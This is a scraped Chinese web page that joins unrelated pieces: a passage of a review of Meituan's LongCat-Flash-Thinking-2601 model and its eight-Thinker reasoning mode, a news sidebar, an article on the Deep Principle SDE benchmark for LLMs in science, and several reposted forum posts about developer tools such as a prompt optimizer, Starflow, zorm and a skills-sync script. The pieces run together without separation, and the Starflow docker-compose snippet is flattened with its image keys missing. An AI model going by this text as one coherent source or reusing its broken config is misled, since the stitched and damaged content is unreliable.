    大部分 Thinker 给出了答案 5,其中 3 号和 6 号 Thinker 还写出详细的推导过程。待 8 个 Thinker 执行完任务后,模型再验证不同 Thinker 的思考过程,形成最终答案。

    整个过程就像一个团队开会讨论问题,最后达成共识,最终给出的解答也更靠谱得多。

    图片

    下面是道逻辑推理题。「A 的手机号码最后 5 位,由五个不同的数字组成。B 说:我猜它是 84261。C 说:我猜它是 26048。D 说:我猜它是 49280。A 说:巧了,你们每人都猜对了位置不相邻的两个数。你知道这五位号码是多少?」

    图片

    8 个 Thinker 再次启动,各自从不同角度切入。

    模型没有简单地按照「少数服从多数」的原则采纳意见,而是调用一段代码,系统验证答案是否满足所有约束条件,并穷举所有可能的组合,确认 86240 是唯一解。

    这种将单个模型调用八次的模型编排方式,在技术实现上虽直接,却在实际效果上发挥出「三个臭皮匠顶过诸葛亮」的优势。

    实测过程中,我们还发现了重思考模式的一种有趣玩法:投票。

    举个例子,我们可以开启「深度思考」模式,然后让模型选出 2000 年代最优秀的华语流行歌手。

    我们发现不同的 Thinker 会给出很不一样的答案,比如有一个仅选出了周杰伦、蔡依林、孙燕姿、王菲、陈奕迅五位代表,而另一个则直接列出了一长串名单。

    最终,经过模型在总结阶段的汇总整理,LongCat-Flash-Thinking-2601 给出了一份涵盖多维度评估的名单,颇具参考性。

    图片

    我们又试了下该模型的编程能力。先让它生成一个 Flappy Bird 小游戏,效果很不错。

    图片

        Prompt:Make a game like flappy bird using HTML/CSS/JS in a single HTML file.

    接下来我们又试了试让其编写一个康威生命游戏:

    图片

    Prompt:用 Python 写一个 Conway 生命游戏,提供可视化网格、暂停、单步和参数调节功能。

    但实事求是地说,使用 8 个 Thinker 来完成编程任务的计算成本应当是比较高的,可能并不适合大规模应用(尽管目前该模型对普通用户免费),但是我们认为这种模式却非常适合医疗、金融、法律等可能需要多次深度思考来保证准确性的场景。

    最后,我们再来测试一下 LongCat-Flash-Thinking-2601 模型主打的 Agent 能力,其中的核心便是工具调用。

    为了方便用户测试,美团专门构建了一个「大模型工具使用测试」平台。该平台能基于关键词随机生成复杂的 OOD(分布外)任务,专门用来试探模型在陌生环境下的行动能力。

    我们随机生成了一个「营养补给方案」任务。平台瞬间拉起了一个包含近 30 个工具的复杂图谱。从页面右侧的依赖关系可以看出,这并非简单的线性调用,模型需要像经验丰富的营养学家,理清儿童营养需求分析、食物营养成分计算、过敏食物筛选等工具之间环环相扣的逻辑。

    图片

    更有趣的是,该平台还支持模型对比,让用户可以轻松地将 LongCat-Flash-Thinking 与其它模型放在同一起跑线上进行对比。

    这里我们将其与当前大模型界的顶级选手 Claude 4.5 Opus 放在了同一个赛道上,进行同步竞技。

          8 倍速视频

    视频展示了两个模型在高频调用工具时的思考流。在任务完成后,系统会调用 AI 评估员,从执行速度与任务达成度两个维度进行复盘。

    图片

    在这个具体案例中,两个模型都交出了高分答卷,但 LongCat 成功达到了 100% 的标准覆盖率,而 Claude 4.5 Opus 却未能成功为用户创建健康档案,仅达到了 80% 的覆盖率。整体而言,LongCat 在处理工具依赖关系的响应节奏上展现出了更强的稳定性。

    深入细节,我们可以看到这些工具的调用和输出都采用了标准的 JSON 格式,这也是当前大量的 MCP 或 API 工具采用的主流格式。这也意味着,我们可以非常轻松地将 LongCat-Flash-Thinking-2601 整合进到现有的工作流程中。

    图片

    强大实力的根基:重思考 + 智能体

    那么,表现如此亮眼的 LongCat-Flash-Thinking-2601 究竟是如何炼成的?

    正如其推文总结的那样,我们先给出几个关键词:并行思考、迭代式总结、环境规模扩展(Environment Scaling)、多环境大规模强化学习(Multi-Environment RL Scaling)、课程学习(Curriculum Learning)。另外,还有即将发布的 ZigZag Attention

    作为 LongCat-Flash-Thinking 的最新版本,2601 版本继承了上一版本的领域并行训练方案,而技术底座同样是参数总量达 560B 的高性能混合专家(MoE)架构模型。

    图片

          来自 LongCat-Flash-Thinking 技术报告

    在此基础上,如上文评测所示,除了一些细节上的优化,这个新版本重点引入了两大改进:重思考模式智能体能力

    该模型新引入的重思考模式别具一格,我们目前还未见其它任何模型显式或开源地提供类似模式。

    而在智能体能力方面,美团引入了一套精心设计的流程。该流程结合了环境规模扩展与后续任务合成,并会在此之上进行可靠且高效的大规模、多环境强化学习。为更好地适应真实世界智能体任务中固有的噪声与不确定性,美团 LongCat 团队还对多种类型和不同强度的环境噪声进行了系统分析,并采用课程式训练,使模型在非理想条件下依然保持稳健表现。

    下面我们就来更具体地看看美团的这些核心技术。

    重思考模式:推理广度与深度的协同扩展

    打开 longcat.ai 「深度思考」后开始体验,你第一时间就会被同时冒出的 8 个 Thinker 吸引注意。这正是 LongCat 团队提出的 Heavy Thinking Mode(重思考模式)的外在表现。它不仅看起来炫酷,更重要的是将推理能力推向了新的边界。

    图片

    大致来看,其与 AI 大牛 Andrej Karpathy 实验性的大模型议会项目有相似之处,但不同的是,Karpathy 的大模型议会是通过模型编排方式来向不同模型构成的集体提出问题,让它们各自发言并讨论后给出最终解答,而 LongCat-Flash-Thinking-2601 新引入的重思考模式则是并行地调用一个模型 8 次来实现高强度的并行思考。

    如此一来,便可以同时获得多条相互独立的推理路径并进行交叉验证,从而显著降低偶然性错误,提升在复杂问题上的稳定性、可靠性与最终答案质量。如此一来,可以进一步提升模型在极具挑战性任务上的表现。

    具体来说,该模式会将高难度问题求解分解为两个互补阶段:并行思考总结,从而同时扩展推理的深度与宽度。

    • 推理宽度方面,重思考模式会并行生成多条独立轨迹,以广泛探索不同推理路径,并采用相对较高的推理温度以保证多样性。

    • 推理深度方面,总结阶段生成的精炼轨迹可以递归反馈给总结模型,形成支持逐步加深推理的迭代推理回路。LongCat 团队还专门设计了额外的强化学习阶段来训练总结能力,进一步释放该模式的潜力。

    智能体能力提升:环境规模扩展与多环境强化学习

    智能体能力方面,LongCat 团队精心设计了一套自动化环境规模扩展链路,并构建了一组多样且高质量的环境,作为工具调用类任务强化学习的训练场,使模型能够习得高层次、可泛化的智能体能力。

    每个环境包含多达 60 余种工具,并以高密度依赖图的形式组织,提供了足够的复杂度以支持多样化任务构建与大规模探索。实验表明,随着训练环境数量的增加,模型在分布外(OOD)任务中的表现会持续提升(Environment Scaling)。

    高质量任务构建

    为确保训练任务集的质量,LongCat 团队对任务复杂度和多样性进行显式控制。每个任务都定义在从高质量环境中采样得到的连通子图之上,任务复杂度通过要求在该子图内尽可能多地协同使用工具来调节。为促进任务多样性,已选工具的再次采样概率会逐步降低。

    LongCat 团队还构建了配套数据库以确保任务的可执行性,并验证每个任务至少存在一种可执行解。然而,当环境中包含大量工具时,跨数据库的一致性维护会变得困难,可能导致部分任务无法验证。针对这一问题,LongCat 团队设计了专门的应对策略,使训练的稳定性和有效性得到了充分保障。

    多环境强化学习

    在保持高效异步训练和流式 rollout 特性的同时,LongCat 团队进一步扩展了其强化学习基础设施 DORA(异步弹性共卡系统),以支持环境规模扩展下的大规模多环境智能体训练(Multi-Environment RL Scaling)。

    具体而言,来自多个环境的任务会在每个训练批次中以平衡的方式混合,并根据任务复杂度和当前训练状态分配不同的 rollout 预算。

    下图展示了该模型的多环境混合强化学习训练曲线,可以看到上涨的趋势非常稳定,这表明美团构建的基础设施和算法可以有效保证训练的稳定性。

    图片

    下图则展示了多环境强化学习训练下,模型在不同 OOD 测试集上的 RL Scaling 表现,效果非常明显。

    图片

    面向噪声环境的稳健训练

    真实世界的智能体环境天然存在噪声和缺陷,仅在理想化环境中训练模型往往难以获得足够的稳健性。为此,LongCat 团队在训练过程中显式引入环境不完美因素,以提升模型的稳健性。

    具体而言,LongCat 团队系统分析了智能体场景中真实世界噪声的主要来源,并设计了一套自动化流程,将这些噪声注入训练环境。在强化学习阶段,LongCat 团队采用课程式策略,随着训练推进逐步增加噪声的类型和强度。

    下图展示了模型是否采取面向噪声环境的稳健训练,在带噪声 / 无噪声评测集下的表现对比,其中不同的评测集上依据特性添加了不同类型的噪声。可以看到,带噪声环境下未经过稳健训练的模型的表现会出现大幅衰减,Claude 也无法适应全部的噪声类型。而经过稳健训练后,LongCat-Flash-Thinking-2601(Training w/ Noise 组) 对环境的噪声和不确定性展现出了强大的适应能力,并在各类非理想条件下取得更优表现。

    图片

    得益于这些改进与创新,LongCat-Flash-Thinking-2601 不仅在智能体工具使用、智能体搜索以及工具融合推理等基准测试中达到顶尖水平,还在任意的 OOD(分布外)真实世界智能体场景中展现出显著提升的泛化能力。

    LongCat ZigZag Attention:实现超长上下文

    LongCat ZigZag Attention,顾名思义,是一种注意力机制,根据其官方推文描述,其一大核心亮点是能「实现 100 万 token 上下文」。据悉,LongCat ZigZag Attention 已被成功用于训练当前 LongCat-Flash-Thinking 模型的一个分支,我们也将很快见证这个分支版本面世。细节详见论文:https://arxiv.org/abs/2512.23966

    图片

    One More Thing

    回头来看,美团大模型站到台前时间并不算长但节奏清晰,首次亮相在 2025 年 9 月,此后保持了每月一更的开源节奏,不断扩容自己的能力库:从强调响应速度的 LongCat-Flash-Chat 到专注逻辑的 Thinking 版本,再到图像和视频模型以及覆盖多模态的 Omni 版本,每一步迭代都在让这只龙猫能够更好地理解这个世界,并让复杂的现实生活变得更加可计算。

    图片

           美团在 Hugging Face 上的论文页面

    这一次,龙猫聚焦 Agent 与 Thinking 能力进行全面提升,也是实现了一次从理解到融入真实世界的跃迁。

    或许,美团现在追求的,就是一种确定性:能够用技术在真实世界中又好又快地解决问题,终有一天让「模型即服务」。

    神同步OpenAI!中国团队Deep Principle领衔发布LLMs for Science评测,引爆外网

    0%
    icon展开列表
    面向临床的心电图AI,上智院、复旦等提出CLEAR-HUG框架实现诊断性能与可解释性双突破
    今天
    img
    神同步OpenAI!中国团队Deep Principle领衔发布LLMs for Science评测,引爆外网
    今天
    img
    美团又上新模型,8个Thinker齐开工,能顶个诸葛亮?
    今天
    img
    失去三个联创后,Mira公司危机持续:又有两人要出走
    今天
    img
    不止于量化:最新综述用「时-空-构」三维视角解构KV Cache系统级优化
    今天
    img
    支付宝携手千问App、淘宝闪购等发布中国首个AI商业协议ACT
    今天
    img
    刚刚,Geoffrey Hinton成为第二位引用量破百万的科学家
    今天
    img
    腾讯AngelSlim升级,首个集LLM、VLM及语音多模态为一体的投机采样训练框架,推理速度飙升1.8倍
    今天
    img
    DeepSeek连发两篇论文背后,原来藏着一场学术接力
    今天
    img
    仅需一个混频器的无线射频机器学习推理,登上Science Advances!
    今天
    img
    国内首个可复现!萝博派对公开人形机器人 “从 0 到跑” 全开源方案
    01月15日
    img
    联发科天玑9500s、8500发布:GPU、光追拉满,红米Turbo 5Max将搭载
    01月15日
    img
    通用级PixVerse P1的技术突破,揣着进入平行世界的密码
    01月15日
    img
    Mira公司内乱?CTO被开除,带团队回OpenAI,翁荔上推发言
    01月15日
    img
    Nature丨清华等团队揭示AI科研双重效应:个人效率亦或是科学边界
    01月15日
    img
    刚刚,喝到了千问APP给我点的奶茶
    01月15日
    img
    人脸机器人登上Science Robotics封面:用AI教会仿生人脸机器人「开口说话」
    01月15日
    img
    实测夸克「千问划词快捷指令」,这7个邪修Prompt,建议收藏
    01月15日
    img
    已证实!清华姚班陈立杰全职加入OpenAI,保留伯克利教职
    01月15日
    img
    解锁任意步数文生图,港大&Adobe全新Self-E框架学会自我评估
    01月15日
    img

    神同步OpenAI!中国团队Deep Principle领衔发布LLMs for Science评测,引爆外网

    作者丨论文团队

    编辑丨ScienceAI

    最近,一篇由中国团队领衔全球 24 所 TOP 高校机构发布,用于评测 LLMs for Science 能力高低的论文,在外网炸了!

    当晚,Keras (最高效易用的深度学习框架之一)缔造者 François Chollet 转发论文链接,并喊出:「我们迫切需要新思路来推动人工智能走向科学创新。」

    图片

    AI 领域 KOL Alex Prompter 分享论文核心摘要后,NBA 独行侠队老板 Mark Cuban 跟帖转发,硅谷投资人、欧洲家族办公室、体育媒体同时涌进评论区。

    图片

    仅一夜,累计阅读量逼近 200 万。

    值得一提的是,同一时间窗里,OpenAI 也发布了对于 AI 在科学发现领域能力评测的论文《FrontierScience: Evaluating Al's Ability to Perform Scientific Research Tasks》概述,指出现有评测标准在 AI for Science 领域失灵。

    图片

    神同步 OpenAI、海外讨论出圈,究竟是什么样的一份工作成果,搅动了全球 AI 舆论场?

    AI 距离可以助力科学发现还有多远?

    前段时间,美国推出「创世纪计划」,号称要调动「自阿波罗计划以来最大规模的联邦科研资源」,目标是在十年内将美国科研的生产力和影响力翻倍。

    但在人工智能估值泡沫隐现、能耗与产出比饱受质疑的当下,一面是资本的狂欢,另一面却是 AI 能力困于「文生图」等表层应用的尴尬;一面是各类大语言模型频繁霸榜 GPQA、MMMU 等题库式 Benchmark 的层出不穷,另一面却是现有 LLMs 还无法准确解析简单核磁图谱的尴尬现状。

    人们不禁要问:能在题库拿高分,就能助力科学发现吗?现在的模型距离科学发现还有多远?究竟什么样的 AI 模型可以胜任,拓宽人类的生存边界?这些讨论,在中美 AI 竞争白热化的当下变得愈发浓烈。

    在此背景下,由中国 AI for Science 领域的初创企业「深度原理 Deep Principle」领衔麻省理工学院、哈佛、普林斯顿、斯坦福、剑桥、牛津等全球 24 所科研院校共同发布的《Evaluating LLMs in Scientific Discovery》论文,正式回答该时代之问。

    论文推出了 LLM for Science 首套评测体系 SDE(Scientific Discovery Evaluation),从科学问题到研究项目,对 GPT-5、Claude-4.5、DeepSeek-R1、Grok-4 等全球主流大语言模型在生物、化学、材料、物理领域的科学研究与发现能力完成摸底。

    图片

    同以往评测体系不同的是,SDE 对模型能力的考量,从简单的问答式,引向了具体的「假设 -> 实验 -> 分析」实验场景。

    研究发现,GPT-5、Claude-4.5、DeepSeek-R1、Grok-4 平均准确率 50–70%,远低于它们在 GPQA、MMMU 等题库上的 80–90%;在 86 道「SDE-Hard」难题中,最高分不足 12%,共同暴露出多步推理、不确定性量化和实验与理论闭环的短板。

    更值得警惕的是,模型规模与推理能力的提升已呈现明显的「边际效益递减」。

    GPT-5 相较于前一代模型,参数规模和推理算力显著增加,但在 SDE 基准的四大科学领域中,平均准确率仅提升 3%-5%,部分场景(如 NMR 结构解析)甚至出现性能下滑。

    换句话说,当前大语言模型在推动科学发现方面的表现,还不如一个普通的本科生。

    能领衔 24 所顶尖科研院校发布的背后团队是谁?

    《Evaluating LLMs in Scientific Discovery》论文通讯作者段辰儒,是「深度原理 Deep Principle」创始人兼 CTO。早在 2021 年,在 MIT 攻读化学博士期间,他就已在图灵奖得主 Yoshua Bengio 的支持下,发起了 AI for Science 社区的建立,并在 NeurIPS 上举办 AI for Science workshop。

    2024 年初,他与 MIT 物理化学博士贾皓钧回国,共同创立「深度原理 Deep Principle」。贾皓钧任 CEO,段辰儒任 CTO,两人虽为 95 后,但已在全球 AI for Science 创业领域小有名气。

    创业一年半以来,其已获得线性资本、高瓴创投、蚂蚁集团等多家知名机构的投资,且与晶泰科技、深势科技等 AI for Science 领域的知名企业建立战略合作关系。

    「深度原理 Deep Principle」从创立之初,就带着全球 AI for Science 头部研究者们的期待。目前「深度原理 Deep Principle」已深入全球材料研发中的第一线,将生成式人工智能同量子化学结合起来,致力于推动材料发现等领域进入新纪元。

    在过去的一年中,他们在 Nature 大子刊和 JACS 等顶级期刊上不断扔出重磅成果,宣告着他们的技术领先和开放交流的「95 后创业公司」心态。从开拓扩散生成模型(Diffusion Models)在化学反应的生成,证明「不止要生成材料,更需要生成材料的合成路径」,到机器学习势(Machine Learning Potentials, MLPs)和扩散生成模型的直接对比,证明传统的机器学习势不是「万能」的,再到现在组织各大顶级学者和高校推出 SDE,证明传统一问一答的 Benchmark 不能带领我们走向科学超级智能,精准切入 AI for Science 领域的核心冲突。

    但同时,对于所有的 AI4S 公司而言,在商业真金白银的检验中,AI 能否真正解决新产品研发问题、满足客户期待,是日复一日必须面对的拷问。

    随着与行业头部客户的商业化合作落地,「深度原理 Deep Principle」的数据库中已经汇聚了来源于客户与自己实验室、大量来自第一线的真实工业研发场景数据和模型应用经验。

    学术圈的深耕与在 AI for Science 商业化第一线的积累,让「深度原理 Deep Principle」在提出要构建一把新尺子评测 LLMs for Science 能力时,一呼百应,摇来了 23 家全球 TOP 科学发现机构的 50 余位科学家,成立了制定 SDE 的「梦之队」。

    这其中,不乏活跃在 LLM 领域的大牛学者们,比如:

    • 孙欢(Huan Sun),MMMU 发起人,俄亥俄州立教授

    • 杜沅岂(Yuanqi Du),康奈尔博士,AI4Science 社区「运营大管家」

    • 王梦迪,普林斯顿最年轻教授,AI+Bio Safety 先驱者

    • Philippe Schwaller,IBM RXN 之父,EPFL 教授

    而「深度原理 Deep Principle」前期积累的科学发现场景,成为了后来 SDE 评测体系的前身。

    在经历近 9 个月的跨高校跨学科跨时区的协作后,《Evaluating LLMs in Scientific Discovery》论文正式发布,通讯单位赫然写着:深度原理,杭州,中国。  

    图片

    自此,汇聚着全球顶级科学发现机构的集体智慧,来自中国的创业团队「深度原理 Deep Principle」,和大洋彼岸的 OpenAI,同时站在了向 AI for Science—— 这一人类通往终极 AGI 顶峰攀登的起跑线。

    或许千百年后,当人类回望 AGI 时代,在 21 世纪的四分之一结束的当口,这场由中美团队共同呼应的,对于 AI for Science 的严肃讨论,把 LLMs 在各类问答式榜单上的内卷,向真正科学发现的星辰大海推近了一步。

    至于怎么通往彼岸,段辰儒表示:「当大语言模型在各种科学问答榜单表现饱和,但还不能有效支持科学发现时,就像『考试成绩好』不等于『顶级研究者』,说明我们需要新的评测体系与训练路径。」

    「深度原理 Deep Principle」与 20 多所机构的 50 多位合作者的研究证明了,目前 LLM 的发展路径并不能「顺便攻克」科学发现。

    这条通往科学超级智能之路,需要更多有识之士共同并肩而行。

    demo-interactive-flow


    交互式提示词生成流程

    支持带附件(图,docx,pdf)对话优化提示词


    多轮问题导向优化提示词
    demo-template-management

    Question

    无论是复杂任务,如论文精度,汇报 PPT 大纲制作,深度搜索调研,还是 agent.md
    还是简单任务,比如 linux 命令生成,旅游规划,text2img 绘图
    我都体验过很多万能的模板,也体验了生成提示词的提示词优化器,然而他们都无法满足我的需求
    这并不是这些提示词不行,而是并不适合我
    我想,只有一个模板,他能通过交互式的方式适配到我的业务或需求上,这种方式的模板才真正万能
    然而据我所知,市面上并没有这样的一款工具,因此,我开发了这样一款纯前端项目

    Quote

    一句话介绍: 通过多轮交互式对话,将模糊想法转化为结构化、高质量的 AI 提示词

    在线体验

    【免费免部署免配置体验】一个更贴近日常使用的交互式提示词优化器1 【免费免部署免配置体验】一个更贴近日常使用的交互式提示词优化器2

    目前配置了免费的 apikey,欢迎测试,感谢 @huan 焕佬的支持,额度有限,大家轻点用
    项目地址
    如果这个项目对你有帮助,欢迎给个 Star!

    核心亮点

    1. 智能交互引导

    不需要你是提示词专家,AI 会主动询问:

    • 你的角色定位是什么?
    • 目标受众是谁?
    • 需要什么深度的内容?
    • 期望的输出格式?

    通过交互式表单,几次点击就能明确需求!

    2. 多模态文件支持

    • 上传 PDF 论文,AI 自动解析内容
    • 粘贴图片截图,AI 理解视觉信息
    • 支持 DOCX、TXT 等多种格式

    3. 本地优先 (Local-First)

    • API Key 仅存储在浏览器本地
    • 对话历史使用 IndexedDB 离线存储
    • 无需担心隐私泄露

    4. 现代化体验

    • 深色模式支持
    • 响应式设计(移动端友好)
    • 基于 Shadcn/UI 的精美界面

    案例展示

    案例 1:模糊命令

    Example




    案例 2:复杂任务

    Example

    dog food example




    对比生成后


    然后我有点想选前者

    todo

    Todo

    接入之前看的一个佬的 gemini 网页 2api 项目,实现免配使用
    接入 CC/CODEX/ 寸止,进行交互式 Vibe Coding 提示词增强
    ▢ 提示词收藏与管理
    ▢ 目前元提示词不是很好,还要优化,一些指令遵从不好的模型,如 grok,会偏离流程
    ▢ 有些交互 bug
    ▢ 动画不是很好看
    ▢ icon 很丑,UI 太大众

    碎碎念

    其实用别人项目的时候我屁事都比较多,之前用过一个佬的优化提示词,后面用一直没能力也没时间弄出自己的想法,这次总算心一狠弄了出来,项目本身我还是挺喜欢的,至少满足了我的需求

    这个项目从前天想到到今天上线弄了三天,中间被老板因课题没进度批了一顿,还差点放弃开发,没想到前端项目还开发这么久,可能还是没有前端基础导致,连一个 AI chat ui 的 AI 返回一直白屏都让 cld 用 playwright 和反重力的 gemini 3 pro high 改了一天,不过做出来还是成就感满满,毕竟站在 AI 的肩膀上很快从想法到实现了个稍微复杂的项目,并且自我感觉比较完善

    技术细节

    一共花费挺少的,反重力 0 成本,cld 这边大概花了 10 块吧



    目前用的 ccg 工作流,但是一直没成功调用 codex,gemini,以及寸止,playwright 等 7 个 mcp,由于是纯前端项目,需要不断交互,主要用到前两个,ace 相关 mcp 也偶尔用到,anycode 不怎么用,之前以为跟 ccg 有冲突就没用,一般用开箱未配置的 wezterm


    参考项目

    1. smkalami/prompt-decorators: Prompt Decorators are structured prefixes, such as +++Reasoning and +++StepByStep, designed to enhance AI responses. Inspired by Python decorators, they make AI outputs more logical, accurate, and well-organized without requiring lengthy instructions, simplifying interactions for users.
    2. GitHub - anthropics/prompt-eng-interactive-tutorial: Anthropic's Interactive Prompt Engineering Tutorial
    3. GitHub - tranzwalle/prompt_builder: 基于 [Anthropic 的 Interactive Prompt Engineering Tutorial](https://github.com/anthropics/prompt-eng-interactive-tutorial) 构建的智能 Prompt 优化工具。
    4. GitHub - xavierchoi/Prompt-Enhancer
    5. GitHub - lwh8915/PromptX: PromptX 不仅仅是一个提示词存储工具,它是专为 AI 时代打造的生产力神器。采用 UI/UX Pro Max 设计标准,结合强大的 版本管理 和 智能分类,让你的 AI 工作流效率提升 10x。
    6. GitHub - Hunyuan-PromptEnhancer/PromptEnhancer: PromptEnhancer is a prompt-rewriting tool, refining prompts into clearer, structured versions for better image generation.
    7. GitHub - songtingze/prompt-optimizer: 大模型提示词优化器,让大模型根据测试结果进行反思生成优化建议,并结合用户要求进行提示词优化。
    8. GitHub - linshenkx/prompt-optimizer: 一款提示词优化器,助力于编写高质量的提示词

    参考帖子

    1. 新人水帖,一个提示词优化器项目 - 开发调优 - LINUX DO
    2. 提示词优化分享 - 递归自优化生成系统 - 开发调优 - LINUX DO
    3. 「SSRPrompt」为了方便内部项目的 prompt 管理,产品经理设计了这款开源软件 - 开发调优 - LINUX DO
    4. 【提示词工程】分享那些我认为好用的, 我在用的, 我愿意推荐的提示词 - 文档共建 - LINUX DO

    📌 转载信息
    原作者:
    systemoutprintlnhell
    转载时间:
    2026/1/16 18:50:38

    空闲时间搓了一个可自托管的 GitHub Stars 管理工具,项目大幅使用 vibe codeing,claude opus 贡献了百分之九十五的代码,开源地址:Starflow

    Github 自带的 star 功能个人觉得并不好用,尤其是 list,整理起来非常地繁杂,同类项目很多都没有更新,或者是不喜欢这样那样的界面,故有了此项目。

    我自己在一个小鸡上也部署了这个项目,占用大致一百多 MB,地址 Starflow, 可以在线试试,登录的话默认会读取私库!,介意请勿登录,自行托管即可。

    功能特性

    核心功能

    • Lists 分类管理 - 创建自定义 Lists,将仓库按项目、技术栈或用途分类,支持 24 种预设颜色
    • AI 智能分类 - 接入 OpenAI 兼容 API,一键自动分类所有未整理的仓库
    • 双向同步 - 与 GitHub 实时同步,取消 Star 也会同步到你的账号
    • README 预览 - 无需跳转即可查看仓库的 README 文档

    搜索与筛选

    • 全文搜索 - 按名称、描述快速搜索仓库
    • 多维筛选 - 按语言、List、星标数、更新时间等筛选
    • 排序方式 - 支持按 Star 时间、更新时间、星标数等排序

    数据管理

    • 笔记备注 - 为仓库添加个人笔记,记录使用心得和备忘
    • 导入导出 - 支持 JSON/CSV 格式导出,便于备份和迁移
    • 数据持久化 - PostgreSQL 存储,支持数据目录映射便于备份

    用户体验

    • 主题切换 - 支持亮色 / 暗色模式,偏好自动保存
    • 键盘快捷键 - 支持快捷键操作,提升效率
    • 响应式设计 - 适配桌面和移动端

    预览

    🌙 暗色模式


    ☀️ 亮色模式



    支持自托管,支持 docker-compose 部署,具体部署比如环境变量配置详情可以查看项目 Github README:

    services: starflow:  gemiluxvii/starflow:latest container_name: starflow restart: unless-stopped ports: - "3000:3000" environment: - DATABASE_URL=postgresql://starflow:starflow@db:5432/starflow - GITHUB_CLIENT_ID=${GITHUB_CLIENT_ID} - GITHUB_CLIENT_SECRET=${GITHUB_CLIENT_SECRET} - NEXTAUTH_SECRET=${NEXTAUTH_SECRET} - NEXTAUTH_URL=${NEXTAUTH_URL} depends_on: db: condition: service_healthy db:  postgres:16-alpine container_name: starflow-db restart: unless-stopped environment: - POSTGRES_USER=starflow - POSTGRES_PASSWORD=starflow - POSTGRES_DB=starflow volumes: - ./data/postgres:/var/lib/postgresql/data healthcheck: test: ["CMD-SHELL", "pg_isready -U starflow"]
          interval: 5s timeout: 5s retries: 5 


    AI 分类

    Starflow 支持接入 OpenAI 兼容的 API 进行智能分类。

    支持的服务

    • OpenAI 官方 API
    • 第三方中转站
    • 本地部署的 Ollama、LocalAI 等

    配置方式

    1. 进入「设置」页面
    2. 在「AI 分类」部分填写:
      • API 地址(如 https://api.openai.com 或中转站地址)
      • API Key
      • 模型名称(如 gpt-3.5-turbo
    3. 点击「测试连接」验证配置
    4. 启用 AI 分类功能

    分类说明

    • 提供 15 种标准分类:AI 工具、代理工具、CLI 工具、前端、后端、数据库、DevOps、编辑器、开发工具、下载工具、媒体工具、安全工具、学习资源、系统工具、其他
    • 支持单个仓库分类和批量一键分类
    • 优先匹配已有 Lists,减少重复分类


    技术栈

    • 前端: Next.js 15, React 19, Tailwind CSS 4, Radix UI
    • 后端: Next.js API Routes, NextAuth.js 5, Prisma 5
    • 数据库: PostgreSQL
    • AI: OpenAI 兼容 API


    佬友也可以提提建议,喜欢的话点个 star,不胜感激


    📌 转载信息
    原作者:
    GEMILUXVII
    转载时间:
    2026/1/16 18:49:18

    1. 最近同事为 ZimaOS 项目写了一个极简的 SQLite ORM:zorm,主打一个 简单、够快、好维护。​
    2. 只支持 sqlite,一个文件搞定嵌入式存储,适合小型服务、边缘设备、单机工具这类场景。​
    3. API 尽量贴近原生 SQL,没有复杂的魔法,熟悉 database/sql 的同学几分钟就能上手。​
    4. 内置自 mock 能力,做单元测试不再纠结怎么 stub 掉数据库调用。​
    5. 当前已经在 Zima 系列内部项目中吃自己狗粮,稳定性和性能还不错。​
    6. GitHub 地址:GitHub - IceWhaleTech/zorm: Zima ORM library (just sqlite) that is simple, ultra-fast and self-mockable for Go ,欢迎佬友拍砖、提 issue、提 PR。​
    7. 如果你也在用 Go+SQLite 写小工具或边缘服务,欢迎试用看看,顺手点个 star 支持一下。​

    📌 转载信息
    原作者:
    linkliang
    转载时间:
    2026/1/16 18:48:38

    antigravity 也支持 skills 了,skills 逐渐成为大家的共识。随之而带的带来一个问题,每个工具的 skills 都是在自己的文件结构中去创建和 copy,而且 skills 也是可能需要优化和更新的,导致管理起来挺烦,所以想到基于主工具 claude code 来自动同步 skills 到其它各 ai 工具的想法。

    opencode 自身就会加载 claude code 的 skills,所以没必要同步

    Step 1

    准备好 fswatch,监听 ~/.claude/skills 的变化

    brew install fswatch
    

    Step 2

    准备一个 sync_skills.sh:

    #!/bin/bash
    fswatch -o ~/.claude/skills | while read f; do
        rsync -a --delete --exclude-from=~/.codex/skills/.exclude-list ~/.claude/skills/ ~/.codex/skills/
        rsync -a --delete --exclude-from=~/.gemini/skills/.exclude-list ~/.claude/skills/ ~/.gemini/skills/
        rsync -a --delete --exclude-from=~/.gemini/antigravity/skills/.exclude-list ~/.claude/skills/ ~/.gemini/antigravity/skills/
    done
    

    其中 --exclude-from 是为了在某些工具中想要排除一些 skills 的同步,比如有一些 skills 只能用于某个工具里,就可以创建一个.exclude-list 文件,把要排除的 skills 文件夹名丢进去,一行一个。

    Step 3

    如果想每次重启后自动运行,还可以创建一个 ~/Library/LaunchAgents/com.user.sync_claude_codex_skills.plist

    里面的 xxx 换成自己的

    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
    <plist version="1.0">
    <dict>
        <key>Label</key>
        <string>com.user.sync_claude_codex_skills</string>
    
        <key>ProgramArguments</key>
        <array>
            <string>/bin/bash</string>
            <string>/Users/xxx/sync_skills.sh</string>
        </array>
    
        <key>RunAtLoad</key>
        <true/>
    
        <key>KeepAlive</key>
        <true/>
    
        <key>StandardOutPath</key>
        <string>/tmp/sync_skills.stdout</string>
    
        <key>StandardErrorPath</key>
        <string>/tmp/sync_skills.stderr</string>
    
        <key>EnvironmentVariables</key>
        <dict>
            <key>PATH</key>
            <string>/opt/homebrew/bin:/usr/local/bin:/bin:/usr/bin</string>
        </dict>
    </dict>
    </plist>
    
    

    然后终端执行:

    launchctl load ~/Library/LaunchAgents/com.user.sync_claude_codex_skills.plist
    

    📌 转载信息
    原作者:
    Terran_Wu
    转载时间:
    2026/1/16 18:48:31

    前因:

    上次有佬友问如何自动定时同步上游仓库,当时我随手糊了一段脚本,结果发现 bug 满天飞,于是删除了。同时也推荐了 pull 这个工具,但是这个工具的同步比较随机,不可控。
    于是就搞了现在这个脚本,支持多仓库、多用户、多分支、多平台通知

    食用方法:
    fork 仓库,然后根据 README.md 进行配置。
    上游仓库:可以是任意公开仓库
    目标仓库:可以是任意用户的仓库(需要具备 repo 权限的 token)

    目标仓库支持你 fork 别人的,不影响 pr、创建分支等。也可以你自己创建一个空仓然后搬运。

    该脚本运行于 GitHub Aactions,运行后的 actions 日志会显示上游仓库地址、目标仓库 owner/repo,但是不会暴露各种 token 等私密信息。可以把仓库设置为私密,不影响同步功能和效果。

    推送的消息如下:


    📌 转载信息
    原作者:
    binghe
    转载时间:
    2026/1/16 17:41:31

    代理人

    代理

    CC UI


    📌 转载信息
    原作者:
    xiaola1
    转载时间:
    2026/1/16 17:41:17

